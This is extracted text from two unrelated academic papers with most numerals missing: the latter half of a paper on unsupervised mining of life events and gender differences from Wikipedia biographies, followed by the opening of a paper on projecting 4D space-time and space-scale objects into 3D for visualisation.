life events from text, we can quantita- tively evaluate the performance of our model on the empirical task of predicting the age in a person’s life when an event occurs. for this task, we compare the full model described above with a strong baseline of ` -regularized linear regression and also with comparable models with feature ablations, in order to quantify the extent to which various aspects of the full model are con- tributing to its empirical performance. the compa- rable ablated models include the following: • –correlation, figure b. rather than a lo- gistic normal prior on the entity-specific distri- bution over event types (η), we draw η from a symmetric dirichlet distribution parameterized by a global α. in a dirichlet distribution, arbi- trary correlations cannot be captured. • –time, figure c. in the full model, the time- stamps of the observed events influence the event classes we learn by encouraging them to be internally coherent and time-sensitive. to test this design choice, we ablate time as a fea- ture during inference. • –correlation,–time, figure d. we also test a model that ablates both the correlation structure in the prior and the influence of time; this model corresponds to smoothed, unsuper- vised naı̈ve bayes. as during inference, we define an event to be the set of terms, excluding stopwords and numbers, that are present in the vocabulary of the , most fre- quent words and multiword expressions in the data overall. each event is accompanied by the year of its occurrence, from which we calculate the gold target prediction (the age of the person at the time of the event) as the year minus the entity’s year of birth. for all of the four models described above (the full model and three ablations), we train the model on / of the biographies ( , entities, on average , , events); we split the remaining / of the biographies into development data (where t is ob- served) and test data (where t is predicted). the de- tails of inference for each model are as follows: . full. inference as above for a burn-in period of iterations, using slice sampling (neal, ) to optimize the value of the dirichlet hy- perparameter γ every iterations; after infer- ence, the parameters µη, Ση,µ,σ and φ are es- timated from samples drawn at the final itera- tion and held fixed. for test entities, we infer the map value of η using development data, and predict the age of each test event as the mean time marginalizing over the event type in- dicator z. t̂ = ez[µz]. . –correlation. here we perform collapsed gibbs sampling for iterations, using slice sampling to optimize the value of α and γ ev- ery iterations; after inference, the parame- ters µ,σ and φ are estimated from single final samples and held fixed. for development and test data, we run gibbs sampling on event indi- cators z for iterations and predict the age of each test event as the mean time marginalizing over the event type indicator z. t̂ = ez[µz]. . –time. inference as above for iterations, using slice sampling to optimize the value of γ every iterations; after inference, the pa- rameters µη, Ση and φ are estimated from sin- gle final samples and held fixed. since time is not known to this model during inference, we create post hoc estimates of µ̂z as the empirical mean age of events sampled to event class z us- ing single samples for each event in the training data from the final sampling iteration. for test entities, we infer the map value of η using de- velopment data, and predict the age of each test event as the average empirical age marginaliz- ing over the event type indicator z. t̂ = ez[µ̂z]. . –correlation,–time. we perform infer- ence as above for the –correlation model, and time prediction as in the –time model. t̂ = ez[µ̂z]. to compare against a potentially more powerful discriminative model, we also evaluate linear regres- sion with ` (ridge) regularization, using binary indi- cators of the same unigrams and multiword expres- sions available to the models above. . linear regression. train on training and development data, optimizing the regulariza- tion coefficient λ in three-fold cross-validation. during training, linear regression learns that the terms most indicative of events that take place later in life are stamp, descendant, commemorated, died, plaque, grandson, and lifetime achievement award, while those that denote early events are born, bap- tised, apprenticed, and acting debut. we evaluate all models on identical splits using -fold cross validation. for an interpretable error score, we use mean absolute error, which corre- sponds to the number of years, on average, by which each model is incorrect. mae = n n∑ i= ∣∣t̂− ti ∣∣ ( ) figure presents the results of this evaluation for all models and different choices of the number of latent event classes k ∈ { , , , , , }. lin- ear regression represents a powerful model, achiev- ing a mean absolute error of . years across all folds, but is eclipsed by the latent variable model at k ≥ . the correlations captured by the logis- tic normal prior make a clear difference, uniformly yielding improvements over otherwise equivalent dirichlet models across all k. as expected, mod- els trained without knowledge of time during infer- ence perform less well than models that contain that information. number of event classes (log scale) m ea n ab so lu te e rr or ( ye ar s) model linear regression full model ablation: -time ablation: -correlation ablation: -correlation, -time figure : mean average error (in years) for time pre- diction. analysis to analyze the latent event classes in wikipedia bi- ographies, we train our full model (with a logis- tic normal prior and time as an observable vari- able) on the full dataset of , biographies with age µ age σ % fem. most probable terms in class . . . % high school, graduated, attended, graduating, school, born, early life, class, grew . . . % drafted, nfl draft, round, professional career, draft, overall, selected . . . % graduated, bachelor, degree, university, received, college, attended, earned, b. a. . . . % joined, enlisted, army, served, world war ii, united states army, years, corps . . . % law, university, graduated, received, school, law school, degree, law degree . . . % thesis, received, university, phd, dissertation, doctorate, degree, ph. d., completed . . . % citizen, became, citizenship, united states, american, u. s., british, granted, since . . . % divorce, marriage, divorced, married, filed, wife, separated, years, ended, later . . . % university, teaching, professor, college, taught, faculty, school, department, joined . . . % trial, murder, case, court, charges, guilty, jury, judge, death, convicted . . . % died, accident, killed, death, near, crash, car, involved, car accident, injured . . . % prison, released, years, sentence, sentenced, months, parole, federal, serving . . . % governor, candidate, unsuccessful candidate, congress, ran, reelection . . . % bishop, appointed, archbishop, diocese, pope, consecrated, named, cathedral . . . % chairman, board, president, ceo, became, company, directors, appointed, position . . . % awarded, university, received, honorary doctorate, honorary degree, degree, doctor . . . % fame, inducted, hall, sports hall, elected, national, football hall, international . . . % died, hospital, age, death, complications, cancer, home, heart attack, washington . . . % national, historic, park, state, house, named, memorial, home, honor, museum . . . % statue, unveiled, memorial, plaque, anniversary, erected, monument, death, bronze table : salient event classes learned from , wikipedia biographies. all event classes can be viewed at http://www.ark.cs.cmu.edu/bio. k = event classes; as above, we run inference for a burn-in period of iterations and collect samples from the posterior distributions for z (the event class indicator for each event). table illustrates a sample of event classes along with the mean time µ and standard deviation σ, the gender distribution (calculated from the poste- rior distribution over z for all entities whose gender is known ) and the most probable terms in the class. the latent classes that we learn span a mix of ma- jor life events of wikipedia notable figures (includ- ing events that we might characterize as gradu- ating high school, becoming a citizen, di- vorce, being convicted of a crime, and dy- ing) and more fine-grained events (such as be- ing drafted by a sports team and being in- ducted into the hall of fame). emerging immediately from this summary is an imbalance in the gender distribution for many of these event classes. among the , biographies whose gender is known, . % are of women; we would therefore expect around . % of the partic- using our method of gender inference described in § , we are able to infer gender for . % of biographies ( , ). ipants in most event classes to be female. figures and illustrate five of the most highly skewed classes in both directions, ranked according to the z score of a two-tailed binomial proportion test (h = . ). while some of these classes reflect a biased world in which more men are drafted into sports teams, serve in the armed forces, and are ordained as priests, one latent class that calls out for explanation is that surrounding divorce (divorce, marriage, di- vorced, filed, married, wife, separated, years, ended, later), whose female proportion of . % is nearly triple that of the data overall (and whose z-score re- veals it to be strongly statistically different [p � . ] from the h mean, even accounting for the bonferroni correction we must make when consider- ing the k = tests we implicitly perform when ranking). while we did not approach this analy- sis with any a priori hypotheses to test, our unsu- pervised model reveals an interesting hypothesis to pursue with confirmatory analysis: biographies of women on wikipedia disproportionately focus on marriage and divorce compared to those of men. to test this hypothesis with more traditional z %fem. most frequent terms . . % miss, pageant, title, usa, miss universe, beauty, held, teen, crowned, competed . . % birth, gave, daughter, son, born, first child, named, wife, announced, baby . . % fashion, model, show, campaign, week, appeared, face, career, became, modeling . . % divorce, marriage, divorced, married, filed, wife, separated, years, ended, later . . % summer olympics, competed, olympics, team, finished, event, final, world championships table : female-skewed event classes, ranked by z-score in a two-tailed binomial proportion test. z %fem. most frequent terms - . . % drafted, nfl draft, round, professional career, draft, overall, selected, major league baseball - . . % promoted, rank, captain, retired, army, lieutenant, colonel, major, brigadier general - . . % bar, admitted, law, practice, called, commenced, studied, began, career, practiced - . . % infantry, civil war, regiment, army, enlisted, served, company, colonel, captain - . . % ordained, priest, seminary, priesthood, theology, theological, college, studies, rome table : male-skewed event classes, ranked by z-score in a two-tailed binomial proportion test. means, we estimated the empirical gender propor- tions of biographies containing terms explicitly de- noting divorce (divorced, divorce, divorces and di- vorcing). the result of this analysis confirms that of the model. of the , biographies in which at least one of these terms appears, . % are those of a woman, far more than the . % we would expect (in a two-tailed binomial proportion test against h = . , this difference is significant at p < . ); this corresponds to divorce being mentioned in . % of all , women’s biogra- phies, and . % of all , men’s; on average, a woman’s biography is . times more likely to mention divorce than a man’s. we repeat the gender proportion experiment with terms denoting marriage (married, marry, marries, marrying and marriage) and find a similar trend: of the , biographies where at least one of these terms is mentioned, . % belong to women; again, in a two-tailed proportion test, this difference is sig- nificant at p < . . this corresponds to marriage appearing in . % of all women’s biographies, and . % of men’s; a woman’s biography is . times more likely to mention marriage than a man’s. additional analyses the analysis above represents one substantive result that mining life events from biographical data makes possible. to illustrate the range of other analyses that this method can occasion, we briefly present two other directions that can be pursued: investigating correlations among event classes and the distribution of event classes over historical time. . correlations among events in our full model with a logistic normal prior over a document’s set of events, correlations among latent event classes are learned during inference. from the covariance matrix Ση, we can directly read off cor- relations among events; for other models (such as those with a dirichlet prior), we can infer correla- tions using the posterior estimates for η. table illustrates the event classes that have the highest correlations to the event class defined by family, boss, murder, crime, mafia, became, ar- rested, john, gang, chicago. the structure that we learn here neatly corresponds to a criminal ac- tion frame, with common events for killing, be- ing subject to federal investigation, be- ing arrested and being brought to trial. . historical distribution of events figure likewise illustrates the distribution over time for a set of learned event classes. while the only notion of time that our model has access to during inference is that of time relative to a per- son’s birth, we can estimate the empirical distribu- tion of event classes in historical time by charting the density plot of their observed absolute dates. sev- eral historically relevant event classes are legible, including serving in the army (with peaks dur- . . . . . joined, enlisted, army, served, world war ii . . . . . joined, became, member, party, communist party . . . . opera, debut, made, sang, la, role, di, metropolitan opera . . . river, expedition, fort, near, led, territory . . . . . space, nasa, mission, flight, center, program . . . . . band, guitar, bass, formed, album, drums, guitarist figure : historical distributions of event classes. r event class . family, boss, murder, crime, mafia, became, arrested, john, gang, chicago . killed, shot, police, home, two, car, ar- rested, murder, death, -year-old . trial, murder, case, guilty, court, jury, charges, convicted, death, judge . investigation, federal, charges, office, fraud, campaign, state, commission, former, cor- ruption . arrested, sentenced, years, prison, trial, death, court, convicted, military, months table : highest correlations between the family, boss, murder, crime, mafia class and other events. ing world war i and ii, vietnam and the later iraq wars), opera debut (with peaks in the s), nasa (with peaks in s and the turn of the mil- lenium), joining the communist party (with a rise in the early th century), leading an expe- dition (with a slow historical decline) and join- ing a band (with increasing historical presence). grounding specific life events in history has the po- tential to enable analysis of how historical time af- fects the life histories of individuals—including both the influence of the general passage of time, as on transitions to adulthood (modell et al., ; hogan, ; modell, ), and the influence of specific historical moments like the great depression (elder, ) or world war ii (mayer, ; elder, ). related work in learning general classes of events from text, our work draws on a rich background spanning several research traditions. by considering the structure that exists between event classes, we draw on the origi- nal work on procedural scripts and schemas (min- sky, ; schank and abelson, ) and narra- tive chains (chambers and jurafsky, ; cham- bers and jurafsky, ), including more recent ad- vances in the unsupervised learning of frame seman- tic representations (modi et al., ; o’connor, ; cheung et al., ; chambers, ). in learning latent classes from text, our work is also clearly related to research on topic modeling (blei et al., ; griffiths and steyvers, ). this work differs from that tradition by scoping our data only over text that we have reason to be- lieve describes events (by including absolute dates). while other topic models have leveraged temporal information in the learning of latent topics, such as the dynamic topic model (blei and lafferty, b; wang et al., ) and “topics over time” (wang and mccallum, ), our model is the first to in- fer classes of events whose contours are shaped by the time in a person’s life that they take place. while the information extraction tasks of template filling (hobbs et al., ) and relation detection (banko et al., ; fader et al., ; carlson et al., ) generally fall into a paradigm of classifying text segments into a predetermined ontology, they too have been informed by unsupervised approaches to learning relation classes (yao et al., ) and events (ritter et al., ). our work here differs from this past work in leveraging explicit absolute temporal information in the unsupervised learning of event classes (and their structure). reasoning about the temporal ordering of events likewise has a long tradition of its own, both in nlp (pustejovsky et al., ; mani et al., ; verhagen et al., ; chambers et al., ) and information extraction (talukdar et al., ). rather than attempting to model the ordering of events relative to each other, we focus instead on their occurrence relative to the beginning of a person’s life. wikipedia likewise has been used extensively in nlp; wikipedia biographies in particular have been used for the task of training summarization models (biadsy et al., ), recognizing biographical sen- tences (conway, ), learning correlates of “suc- cess” (ng, ), and disambiguating named enti- ties (bunescu and pasca, ; cucerzan, ). in our work in mining biographical structure from it, we draw on previous research into automatically uncovering latent structure in resumés (mimno and mccallum, a) and approaches to learning life path trajectories from categorical survey data (mas- soni et al., ; ritschard et al., ). in using wikipedia as a dataset for analysis, we must note that the subjects of biographies are not a representative sample of the population, nor are their contents unbiased representations. nearly all ency- clopedias necessarily prefer the historically notori- ous (if due to nothing else than inherent biases in the preservation of historical records); many, like wiki- pedia, also have disproportionately low coverage of women, minorities, and other demographic groups, in part because of biases in community member- ship. estimates of the percentage of female edi- tors on wikipedia, for example, ranges from % to . % (collier and bear, ; reagle and rhue, ; cassell, ; hill and shaw, ; wiki- pedia, ). different language editions of wiki- pedia have a natural geographic bias in article se- lection (hecht and gergle, ), with each empha- sizing their own “local heroes” (kolbitsch and mau- rer, ), and also differ in the kind of information they present (pfeil et al., ; callahan and her- ring, ). this extends to selection of biographies as well, with one study finding approximately % of sampled biographies being those of women (reagle and rhue, ), a figure very close to the . % we observe in our analysis here. conclusion we present a method for mining life events from biographies, leveraging the correlation structure of event descriptions. unlike prior work that has fo- cused on inferring “life trajectories” from categor- ical survey data, we learn relevant structure in an unsupervised manner directly from text, opening the door to applying this method to a broad set of biogra- phies beyond wikipedia (including full-text books from the internet archive or hathi trust, and other encyclopedic biographies as well). in a quantitative analysis, the model we present outperforms a strong baseline at the task of event time prediction, and sur- faces a substantive qualitative distinction in the con- tent of the biographies of men and women on wiki- pedia: in contrast to previous work that uses com- putational methods to measure a difference in cov- erage, we show that such methods are able to tease apart differences in characterization as well. while the task of event time prediction provides a quantitative means to compare different models, we expect the real application of this work will lie in the latent event classes themselves, and the in- formation they provide both about the subjects and authors of biographies. latent topics have provided one way of organizing large document collections in the past (mimno and mccallum, b); in ad- dition to occasioning data analysis of the kind we describe here, we expect that personal event classes can have a practical application in helping to orga- nize data describing people as well. data and code to support this work, including an interface to ex- plore event classes in wikipedia, can be found at http://www.ark.cs.cmu.edu/bio/. acknowledgments we thank the anonymous reviewers, along with dallas card, brendan o’connor, bryan routledge, yanchuan sim and ted underwood, for their help- ful comments. the research reported in this arti- cle was supported by u.s. national science foun- dation grant career iis- to n.a.s. and google’s support of the reading is believing project at cmu. this work was made possible through the use of computing resources made available by the open science data cloud (osdc), an open cloud consortium (occ)-sponsored project. references david bamman, ted underwood, and noah a. smith. . a bayesian mixed effects model of literary character. in acl. michele banko, michael j cafarella, stephen soderland, matthew broadhead, and oren etzioni. . open information extraction for the web. in ijcai, vol- ume , pages – . fadi biadsy, julia hirschberg, and elena filatova. . an unsupervised approach to biography production using wikipedia. in acl ’ , pages – . david m. blei and john d. lafferty. a. correlated topic models. in nips ’ . david m. blei and john d. lafferty. b. dynamic topic models. in icml ’ , pages – . david m. blei and john d. lafferty. . a correlated topic model of science. aas, ( ): – . david m. blei, andrew ng, and michael jordan. . latent dirichlet allocation. jmlr, : – . razvan bunescu and marius pasca. . using ency- clopedic knowledge for named entity disambiguation. in eacl ’ , pages – , trento, italy. ewa s. callahan and susan c. herring. . cultural bias in wikipedia content on famous persons. j. am. soc. inf. sci. technol., ( ): – , october. andrew carlson, justin betteridge, bryan kisiel, burr settles, estevam r. hruschka jr., and tom m. mitchell. . toward an architecture for never- ending language learning. in aaai ’ . bob carpenter. . integrating out multinomial parameters in latent dirichlet allocation and naive bayes for collapsed gibbs sampling. technical re- port, lingpipe. justine cassell. . editing wars behind the scenes. new york times, february . nathanael chambers and dan jurafsky. . unsuper- vised learning of narrative event chains. in acl ’ . nathanael chambers and dan jurafsky. . unsuper- vised learning of narrative schemas and their partici- pants. in acl ’ , pages – . nathanael chambers, shan wang, and dan jurafsky. . classifying temporal relations between events. in proceedings of the th annual meeting of the acl on interactive poster and demonstration sessions, acl ’ , pages – , stroudsburg, pa, usa. as- sociation for computational linguistics. nathanael chambers. . event schema induction with a probabilistic entity-driven model. in emnlp ’ , pages – , seattle, washington, usa, oc- tober. association for computational linguistics. jackie chi kit cheung, hoifung poon, and lucy van- derwende. . probabilistic frame induction. in naacl ’ , pages – , atlanta, georgia, june. association for computational linguistics. benjamin collier and julia bear. . conflict, criti- cism, or confidence: an empirical examination of the gender gap in wikipedia contributions. in cscw ’ . mike conway. . mining a corpus of biographical texts using keywords. literary and linguistic com- puting, ( ): – . silviu cucerzan. . large-scale named entity dis- ambiguation based on wikipedia data. in emnlp- conll, volume , pages – . peter t. davis, david k. elson, and judith l. klavans. . methods for precise named entity matching in digital collections. in jcdl ’ . glen elder. . children of the great depression. university of chicago press. glen elder. . talent, history, and the fulfillment of promise. psychiatry, ( ): – . david k. elson, nicholas dames, and kathleen r. mck- eown. . extracting social networks from literary fiction. in acl ’ , pages – . anthony fader, stephen soderland, and oren etzioni. . identifying relations for open information ex- traction. in emnlp ’ , emnlp ’ , pages – , stroudsburg, pa, usa. association for compu- tational linguistics. jenny rose finkel, trond grenager, and christopher manning. . incorporating non-local informa- tion into information extraction systems by gibbs sam- pling. in acl ’ , pages – . google. . freebase data dumps. https:// developers.google.com/freebase/data. thomas l griffiths and mark steyvers. . find- ing scientific topics. proceedings of the national academy of sciences of the united states of america, (suppl ): – . brent hecht and darren gergle. . measuring self-focus bias in community-maintained knowledge repositories. in c&t ’ , pages – . benjamin mako hill and aaron shaw. . the wiki- pedia gender gap revisited: characterizing survey re- sponse bias with propensity score estimation. plos one, ( ). jerry r hobbs, douglas appelt, john bear, david israel, megumi kameyama, and mabry tyson. . fas- tus: a system for extracting information from text. in proceedings of the workshop on human language technology, pages – . association for compu- tational linguistics. dennis p. hogan and nan marie astone. . the transition to adulthood. annual review of sociology, ( ): – . dennis hogan. . transitions and social change: the early lives of american men. academic, new york. john s justeson and slava m katz. . technical ter- minology: some linguistic properties and an algorithm for identification in text. natural language engineer- ing, ( ): – . josef kolbitsch and hermann a. maurer. . the transformation of the web: how emerging commu- nities shape the information we consume. j. ucs, ( ): – . lee a. lillard and linda j. waite. . a joint model of marital childbearing and marital disruption. demogra- phy, ( ):pp. – . lee a. lillard, michael j. brien, and linda j. waite. . premarital cohabitation and subsequent marital dissolution: a matter of self-selection? demography, ( ):pp. – . inderjeet mani, marc verhagen, ben wellner, chong min lee, and james pustejovsky. . machine learning of temporal relations. in proceedings of the st in- ternational conference on computational linguistics and the th annual meeting of the association for computational linguistics, acl- , pages – , stroudsburg, pa, usa. association for computational linguistics. sébastien massoni, madalina olteanu, and patrick rous- set. . career-path analysis using optimal match- ing and self-organizing maps. in wsom ’ . henry colin gray matthew and brian harrison. . the oxford dictionary of national biography. oxford university press. karl ulrich mayer. . german survivors of world war ii: the impact on the life course of the collective experience of birth cohorts. in social structure and human lives, newbury park. sage. david mimno and andrew mccallum. a. model- ing career path trajectories. technical report - , university of massachusetts, amherst. david mimno and andrew mccallum. b. organiz- ing the oca: learning faceted subjects from a library of digital books. in jcdl ’ , pages – , new york, ny, usa. acm. david mimno, hanna m. wallach, and andrew mccal- lum. . gibbs sampling for logistic normal topic models with graph-based priors. in nips workshop on analyzing graphs. marvin minsky. . a framework for representing knowledge. technical report, mit-ai laboratory. john modell, frank f. furstenberg jr., and theodore her- shberg. . social change and transitions to adult- hood in historical perspective. journal of family his- tory, ( ): – . john modell. . normative aspects of american mar- riage timing since world war ii. journal of family history, ( ): – . ashutosh modi, ivan titov, and alexandre klemen- tiev. . unsupervised induction of frame-semantic representations. in proceedings of the naacl-hlt workshop on the induction of linguistic structure, wils ’ , pages – , stroudsburg, pa, usa. asso- ciation for computational linguistics. radford m neal. . slice sampling. annals of statis- tics, pages – . pauline ng. . what kobe bryant and britney spears have in common: mining wikipedia for characteristics of notable individuals. in icwsm ’ . brendan o’connor. . learning frames from text with an unsupervised latent variable model. arxiv, abs/ . . ulrike pfeil, panayiotis zaphiris, and chee siang ang. . cultural differences in collaborative authoring of wikipedia. journal of computer-mediated com- munication, ( ): – . james pustejovsky, patrick hanks, roser sauri, andrew see, robert gaizauskas, andrea setzer, dragomir radev, beth sundheim, david day, lisa ferro, et al. . the timebank corpus. in corpus linguistics, volume , page . joseph reagle and lauren rhue. . gender bias in wikipedia and britannica. international journal of communication, ( ). steffen reinhold. . reassessing the link between premarital cohabitation and marital instability. de- mography, ( ): – . gilbert ritschard, reto bürgin, and matthias studer. . exploratory mining of life event histories. in j. j. mcardle and g. ritschard, editors, contemporary issues in exploratory data mining in the behavioral sciences, pages – . routledge, new york. alan ritter, mausam, oren etzioni, and sam clark. . open domain event extraction from twitter. in kdd ’ , pages – , new york, ny, usa. acm. roger c. schank and robert p. abelson. . scripts, plans, goals, and understanding: an inquiry into hu- man knowledge structures. lawrence erlbaum, hills- dale, nj. michael j. shanahan. . pathways to adulthood in changing societies: variability and mechanisms in life course perspective. annual review of sociology, ( ): – . partha pratim talukdar, derry wijaya, and tom mitchell. . acquiring temporal constraints between rela- tions. in cikm ’ , pages – , new york, ny, usa. acm. kristina toutanova, dan klein, christopher d. manning, and yoram singer. . feature-rich part-of-speech tagging with a cyclic dependency network. in naacl ’ , pages – . marc verhagen, robert gaizauskas, frank schilder, mark hepple, graham katz, and james pustejovsky. . semeval- task : tempeval temporal re- lation identification. in proceedings of the th interna- tional workshop on semantic evaluations, pages – . association for computational linguistics. xuerui wang and andrew mccallum. . topics over time: a non-markov continuous-time model of topical trends. in kdd ’ , pages – . chong wang, david m. blei, and david heckerman. . continuous time dynamic topic models. arxiv. wikipedia. . wikipedia editors study: results from the editor survey. limin yao, aria haghighi, sebastian riedel, and andrew mccallum. . structured relation discovery using generative models. in emnlp ’ , pages – , stroudsburg, pa, usa. association for computational linguistics. submitted march accepted june published july corresponding author ken arroyo ohori, g.a.k.arroyoohori@tudelft.nl academic editor sándor szénási additional information and declarations can be found on page doi . /peerj-cs. copyright arroyo ohori et al. distributed under creative commons cc-by . open access visualising higher-dimensional space- time and space-scale objects as projections to r ken arroyo ohori, hugo ledoux and jantien stoter d geoinformation, delft university of technology, delft, netherlands abstract objects of more than three dimensions can be used to model geographic phenomena that occur in space, time and scale. for instance, a single d object can be used to represent the changes in a d object’s shape across time or all its optimal representations at various levels of detail. in this paper, we look at how such higher-dimensional space- time and space-scale objects can be visualised as projections from r to r . we present three projections that we believe are particularly intuitive for this purpose: (i) a simple ‘long axis’ projection that puts d objects side by side; (ii) the well-known orthographic and perspective projections; and (iii) a projection to a -sphere (s ) followed by a stereographic projection to r , which results in an inwards-outwards fourth axis. our focus is in using these projections from r to r , but they are formulated from rn to rn− so as to be easily extensible and to incorporate other non-spatial characteristics. we present a prototype interactive visualiser that applies these projections from d to d in real-time using the programmable pipeline and compute shaders of the metal graphics api. subjects graphics, scientific computing and simulation, spatial and geographic information systems keywords projections, space-time, space-scale, d visualisation, nd gis background projecting the d nature of the world down to two dimensions is one of the most common problems at the juncture of geographic information and computer graphics, whether as the map projections in both paper and digital maps (snyder, ; grafarend & you, ) or as part of an interactive visualisation of a d city model on a computer screen (foley & nielson, ; shreiner et al., ). however, geographic information is not inherently limited to objects of three dimensions. non-spatial characteristics such as time (hägerstrand, ; güting et al., ; hornsby & egenhofer, ; kraak, ) and scale (meijers, a) are often conceived and modelled as additional dimensions, and objects of three or more dimensions can be used to model objects in d or d space that also have changing geometries along these non-spatial characteristics (van oosterom & stoter, ; arroyo ohori, ). for example, a single d object can be used to represent the changes in a d object’s shape across time (arroyo ohori, ledoux & stoter, ) or how to cite this article arroyo ohori et al. ( ), visualising higher-dimensional space-time and space-scale objects as projections to r . peerj comput. sci. :e ; doi . /peerj-cs. https://peerj.com mailto:g.a.k.arroyoohori@tudelft.nl https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://dx.doi.org/ . /peerj-cs. (a) (b) (c) (d) figure a d model of a house at two levels of detail and all the equivalences its composing elements is a polychoron bounded by: (a) volumes representing the house at the two levels of detail, (b) a pyra- midal volume representing the window at the higher lod collapsing to a vertex at the lower lod, (c) a pyramidal volume representing the door at the higher lod collapsing to a vertex at the lower lod, and a roof volume bounded by (a) the roof faces of the two lods, (b) the ridges at the lower lod col- lapsing to the tip at the higher lod and (c) the hips at the higher lod collapsing to the vertex below them at the lower lod. (d) a d cross-section of the model obtained at the middle point along the lod axis. all the best representations of a d object at various levels of detail (luebke et al., ; van oosterom & meijers, ; arroyo ohori et al., a; arroyo ohori, ledoux & stoter, c). objects of more than three dimensions can be however unintuitive (noll, ; frank, ), and visualising them is a challenge. while some operations on a higher-dimensional object can be achieved by running automated methods (e.g. certain validation tests or area/volume computations) or by visualising only a chosen d or d subset (e.g. some of its bounding faces or a cross-section), sometimes there is no substitute for being able to view a complete nd object—much like viewing floor or façade plans is often no substitute for interactively viewing the complete d model of a building. by viewing a complete model, one can see at once the d objects embedded in the model at every point in time or scale as well as the equivalences and topological relationships between their constituting elements. more directly, it also makes it possible to get an intuitive understanding of the complexity of a given d model. for instance, in fig. we show an example of a d model representing a house at two different levels of detail and all the equivalences its composing elements. it forms a valid manifold -cell (arroyo ohori, damiand & ledoux, ), allowing it to be represented using data structures such as a d generalised or combinatorial map. this paper thus looks at a key aspect that allows higher-dimensional objects to be visualised interactively, namely how to project higher-dimensional objects down to fewer dimensions. arroyo ohori et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. while there is previous research on the visualisation of higher-dimensional objects, we aim to do so in a manner that is reasonably intuitive, implementable and fast. we therefore discuss some relevant practical concerns, such as how to also display edges and vertices and how to use compute shaders to achieve good framerates in practice. in order to do this, we first briefly review the most well-known transformations (translation, rotation and scale) and the cross-product in nd, which we use as fundamental operations in order to project objects and to move around the viewer in an nd scene. afterwards, we show how to apply three different projections from rn to rn− and argue why we believe they are intuitive enough for real-world use. these can be used to project objects from r to r , and if necessary, they can be used iteratively in order to bring objects of any dimension down to d or d. we thus present: (i) a simple ‘long axis’ projection that stretches objects along one custom axis while preserving all other coordinates, resulting in d objects that are presented side by side; (ii) the orthographic and perspective projections, which are analogous to those used from d to d; and (iii) an inwards/outwards projection to an (n− )-sphere followed by an stereographic projection to rn− , which results in a new inwards-outwards axis. we present a prototype that applies these projections from d to d and then applies a standard perspective projection down to d. we also show that with the help of low-level graphics apis, all the required operations can be applied at interactive framerates for the d to d case. we finish with a discussion of the advantages and disadvantages of this approach. higher-dimensional modelling of space, time and scale there are a great number of models of geographic information, but most consider space, time and scale separately. for instance, space can be modelled using primitive instancing (foley et al., ; kada, ), constructive solid geometry (requicha & voelcker, ) or various boundary representation approaches (muller & preparata, ; guibas & stolfi, ; lienhardt, ), among others. time can be modelled on the basis of snapshots (armstrong, ; hamre, mughal & jacob, ), space–time composites (peucker & chrisman, ; chrisman, ), events (worboys, ; peuquet, ; peuquet & duan, ), or a combination of all of these (abiteboul & hull, ; worboys, hearnshaw & maguire, ; worboys, ; wachowicz & healy, ). scale is usually modelled based on independent datasets at each scale (buttenfield & delotto, ; friis-christensen & jensen, ; meijers, b), although approaches to combine them into single datasets (gröger et al., ) or to create progressive and continuous representations also exist (ballard, ; jones & abraham, ; günther, ; van oosterom, ; filho et al., ; rigaux & scholl, ; plümer & gröger, ; van oosterom, ). as an alternative to the all these methods, it is possible to represent any number of parametrisable characteristics (e.g. two or three spatial dimensions, time and scale) as additional dimensions in a geometric sense, modelling them as orthogonal axes such that real-world d– d entities are modelled as higher-dimensional objects embedded in higher- dimensional space. these objects can be consequently stored using higher-dimensional arroyo ohori et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. a coordinate system based on projective geometry and typically used in computer graphics. an additional coordinate indicates a scale factor that is applied to all other coordinates. data structures and representation schemes Čomić & de floriani ( ); arroyo ohori, ledoux & stoter ( b). possible approaches include incidence graphs (rossignac & o’connor, ; masuda, ; sohanpanah, ; hansen & christensen, ), nef polyhedra bieri & nef ( ), and ordered topological models brisson ( ); lienhardt ( ). this is consistent with the basic tenets of n-dimensional geometry (descartes, ; riemann, ) and topology (poincaré, ), which means that it is possible to apply a wide variety of computational geometry and topology methods to these objects. in a practical sense, d topological relationships between d objects provide insights that d topological relationships cannot (arroyo ohori, boguslawski & ledoux, ). also, mckenzie, williamson & hazelton ( ) contends that weather and groundwater phenomena cannot be adequately studied in less than four dimensions, and van oosterom & stoter ( ) argue that the integration of space, time and scale into a d model for gis can be used to ease data maintenance and improve consistency, as algorithms could detect if the d representation of an object is self-consistent and does not conflict with other objects. basic transformations and the cross-product in nd the basic transformations (translation, scale and rotation) have a straightforward definition in n dimensions, which can be used to move and zoom around a scene composed of nd objects. in addition, the n-dimensional cross-product can be used to obtain a new vector that is orthogonal to a set of other n− vectors in rn. we use these operations as a base for nd visualisation and are thus described briefly below. the translation of a set of points in rn can be easily expressed as a sum with a vector t = [t ,...,tn], or alternatively as a multiplication with a matrix using homogeneous coordinates in an (n+ )×(n+ ) matrix, which is defined as: t =   ··· t ··· t ... ... ... ... ... ··· tn ···  . scaling is similarly simple. given a vector s= [s ,s ,...,sn] that defines a scale factor per axis (which in the simplest case can be the same for all axes), it is possible to define a matrix to scale an object as: s=   s ··· s ··· ... ... ... ... ··· sn  . rotation is somewhat more complex. rotations in d are often conceptualised intuitively as rotations around the x, y and z axes. however, this view of the matter is only valid in d. in higher dimensions, it is necessary to consider instead rotations parallel to a given plane (hollasch, ), such that a point that is continuously rotated (without arroyo ohori et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. changing the rotation direction) will form a circle that is parallel to that plane. this view is valid in d (where there is only one such plane), in d (where a plane is orthogonal to the usually defined axis of rotation) and in any higher dimension. incidentally, this shows that the degree of rotational freedom in nd is given by the number of possible combinations of two axes (which define a plane) on that dimension (hanson, ), i.e. ( n ) . thus, in a d coordinate system defined by the axes x, y, z and w, it is possible to define six d rotation matrices, which correspond to the six rotational degrees of freedom in d (hanson, ). these respectively rotate points in r parallel to the xy, xz, xw, yz, yw and zw planes: rxy =   cos θ −sin θ sin θ cos θ   rxz =   cos θ −sin θ sin θ cos θ   rxw =   cos θ −sin θ sin θ cos θ   ryz =   cos θ −sin θ sin θ cos θ   ryw =   cos θ −sin θ sin θ cos θ   rzw =   cos θ −sin θ sin θ cos θ  . the n-dimensional cross-product is easy to understand by first considering the lower- dimensional cases. in d, it is possible to 